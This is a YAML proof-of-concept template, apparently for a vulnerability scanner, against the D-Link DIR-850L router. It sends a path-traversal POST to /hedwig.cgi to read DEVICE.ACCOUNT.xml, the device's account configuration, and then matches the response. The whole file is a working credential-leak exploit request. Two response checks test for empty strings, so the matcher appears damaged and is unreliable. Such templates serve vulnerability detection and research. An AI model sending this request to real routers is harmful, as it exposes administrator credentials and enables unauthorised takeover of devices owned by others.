name: poc-yaml-dlink-850l-info-leak
rules:
- method: POST
path: /hedwig.cgi
headers:
Content-Type: text/xml
Cookie: uid=R8tBjwtFc8
body: |-
../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml
follow_redirects: false
expression: >
response.status == 200 && response.content_type.contains("xml") && response.body.bcontains(b"") && response.body.bcontains(b"") && response.body.bcontains(b"OK")
detail:
author: cc_ci(https://github.com/cc8ci)
Affected Version: "Dir-850L"
links:
- https://xz.aliyun.com/t/2941